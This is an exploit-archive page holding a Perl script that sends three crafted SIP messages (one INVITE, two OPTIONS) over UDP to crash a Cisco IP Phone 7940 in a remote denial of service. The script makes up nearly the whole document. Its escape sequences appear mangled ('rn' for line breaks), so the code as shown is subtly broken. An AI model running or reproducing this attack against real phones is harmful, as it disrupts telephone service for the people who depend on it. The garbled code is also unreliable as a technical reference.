Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit
# Published : 2007-08-21
# Author : MADYNES
# Previous Title : PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC
# Next Title : Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDPt192.168.1.2;rport;branch=00rnFrom: <sip:gasparin@192.168.1.2>;tag=00rnTo: <sip:$ARGV[2]@$ARGV[0]>;tag=00rnCall-ID: et@192.168.1.2rnCSeq: 10 INVITErnContent-Length: 0rnrn";;

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01rnFrom: <sip:gasparin@192.168.1.2>;tag=01rnTo: <sip:$ARGV[2]@$ARGV[0]>rnCall-ID: et@192.168.1.2rnCSeq: 11 OPTIONSrnContent-Length: 0rnrn";

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02rnFrom: <sip:gasparin@192.168.1.2>;tag=02rnTo: <sip:$ARGV[2]@$ARGV[0]>rnCall-ID: et@192.168.1.2rnCSeq: 12 OPTIONSrnContent-Length: 0rnrn";

$socket->send($msg);

# www.Syue.com [2007-08-21]